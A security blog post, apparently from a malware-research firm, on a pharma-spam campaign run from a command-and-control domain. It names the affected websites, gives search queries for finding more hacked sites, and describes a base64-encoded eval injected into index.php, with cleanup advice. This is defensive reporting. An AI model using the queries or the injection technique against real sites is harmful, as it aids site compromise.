More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Yes, that’s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg tadalafil, viagra, etc).

Just some of the affected sites:

www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
summits.aberdeen.com
www.greenway.org
www.oldlife.org

Finding them on Google is pretty simple as well: inurl:.org ” 5mg tadalafil” or you can also search for: “http://www.google-traffic-analytics.com” “Warning: file_get_contents” which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.

As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.

We will post more details when we have them.


Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • marc

    thanks for this post! I’m working on the brooklynwaldorf.org website and i just deleted several php files from the root directory (c.php, l.php, cart.php, etc.) and a load of files in our img directory. Wondering if there is anything else to do, but wait and see if our search results recover?

    I’m not sure that I understand the connection to google-traffic-anylitics.com – do you think there are any specific fixes to do here? So far, I’ve only deleted files and changed the ftp password…